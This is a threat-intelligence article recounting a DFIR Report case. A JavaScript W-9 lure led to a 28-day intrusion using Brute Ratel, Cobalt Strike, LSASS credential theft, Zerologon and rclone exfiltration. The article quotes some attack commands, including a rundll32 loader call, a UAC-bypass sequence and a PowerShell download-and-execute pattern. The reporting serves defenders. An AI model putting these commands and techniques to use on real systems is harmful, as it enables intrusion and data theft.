W-9 Lure Kicks Off 28-Day Intrusion Ending in Exfiltration With No Ransomware

In May 2024, The DFIR Report documented an intrusion that began with a tax-themed lure and unfolded intermittently over nearly two months, with concentrated, hands-on activity spanning roughly 28 days. Initial access traced to a malicious JavaScript “W-9” file that kicked off a multi-stage payload chain and set the tone for a patient, return-and-resume operation. Based on historical use of the JavaScript file, this intrusion is likely associated to the Lunar Spider threat group. Across the window of activity, the operators pursued credential theft, lateral movement, and data theft, testing multiple access avenues and re-tooling when needed. Despite the breadth of access and the use of multiple frameworks, the investigation notes no ransomware detonation at the end of the operation; instead, the actors were ultimately evicted from the network. As The DFIR Report puts it, the case shows how a single click can seed “a near two-month intrusion,” even when the most destructive endgame never materializes.

Day 1 (about six hours and eight minutes) began when a user executed a JavaScript downloader that fetched an MSI, which in turn loaded a DLL (“upfilles.dll”) associated with Brute Ratel and set a Run-key for persistence. A second loader established command-and-control (C2) and injected into “explorer.exe,” after which discovery started quickly through native commands: “ipconfig /all,” “systeminfo,” “nltest /domain_trusts,” “nltest /domain_trusts /all_trusts,” “net view /all /domain,” “net view /all,” “net group "Domain Admins" /domain,” “net config workstation,” a WMI query for installed AV via “wmic.exe,” and “whoami /groups.” The DFIR Report observed follow-on beaconing and the use of a backconnect/VNC channel for interactive browsing and file staging. Persistence and discovery were paired with process injection to keep activity blended with user-mode programs. By the end of the first day, the operators had firmly established their foothold, working out of living-off-the-land binaries and staging additional payloads for later use.

Day 3 contained two brief actions separated by more than nine hours, but yielded a pivotal escalation source: an “unattend.xml” answer file “containing plaintext domain administrator credentials left over from an automated deployment process. This provided the threat actor with immediate high-privilege access to the domain environment,” The DFIR Report writes. Day 4 then delivered the heaviest activity (nearly nine hours). A Cobalt Strike DLL landed under “C:\ProgramData” and ran via “rundll32” (e.g., “rundll32 cron801.dl_,lvQkzdrFdILT”), with “rundll32” subsequently injecting into “sihost.exe” and “explorer.exe” (corroborated by CreateRemoteThread telemetry). From an injected context, “gpupdate.exe” accessed LSASS for credential material, while Active Directory discovery expanded with ADFind and additional built-in commands. Lateral movement progressed through “PsExec,” a “Backconnect” retrieval, and a scheduled task for persistence, alongside an elevation sequence that hijacked “ms-settings” and used “ComputerDefaults.exe” to run PowerShell without prompts. Later that same day, the actors executed a custom Zerologon tool (“zero.exe”) to abuse CVE-2020-1472 and press deeper into domain infrastructure.

On Day 5 (03:39–04:03 UTC, then a pause until 16:50 UTC), the operators used “RDP” from the beachhead to a server, dropped a new Cobalt Strike beacon, and repeated the pattern on a file share host, then refreshed persistence with a new Brute Ratel DLL under the Run key. Activity then went quiet for two weeks. On Day 19, a renamed “badger” DLL re-established local persistence; on Day 20, a renamed “rclone” binary, a configuration, and a simple batch/VBScript wrapper were introduced on the file server to automate exfiltration. The toolkit synchronized staged data to attacker-controlled infrastructure and ran for almost ten hours, while the operators carefully filtered file types and size/age ranges to maximize value and throughput. Throughout these phases, repeated PowerShell download-and-execute patterns (e.g., “IEX (New-Object Net.WebClient).DownloadString(...)”) appeared, matching the operation’s preference for in-memory staging and short-lived artifacts. The DFIR Report attributes the cadence—recon, pause, lateral move, pause, then exfil—to a crew comfortable leaving long-lived beacons and returning when conditions favored progress.

Late-stage actions consolidated credentials and mapped remaining access paths. On Day 26 (13:58–16:07 UTC), injected processes returned to LSASS, and a PowerShell script (“Veeam-Get-Creds.ps1”) ran from an injected “spoolsv.exe” to extract stored backup credentials, reinforcing access to virtual infrastructure and protected data. Day 28 saw the download and execution of “rustscan,” which the operators used to enumerate SMB exposure across /16 and /8 blocks; they paired this with additional reconnaissance of shares via PowerView’s “Invoke-ShareFinder.” Lateral movement over the full operation relied on multiple channels: WMI remoting for attempted code execution, remote services with “PsExec” to distribute “system.dl_” across the domain controller, a file server, and a backup server, and the Zerologon utility for privilege manipulation and domain pivoting. The DFIR Report notes: “During the intrusion the threat actor used zero.exe to move laterally between devices in the network. The executable was executed on the beachhead host and targeted a second domain controller, overall it was executed eight different times with a different username being used every execution. The execution used remote services to run code on lateral hosts.” With credentials in hand, “RDP” became the preferred interactive channel. Ultimately, despite exfiltration and deep domain reach, no encryption operations followed; per The DFIR Report, the actors were removed from the environment, closing a campaign that showcased fileless execution, staged credential harvesting, and measured data theft without a ransomware finale.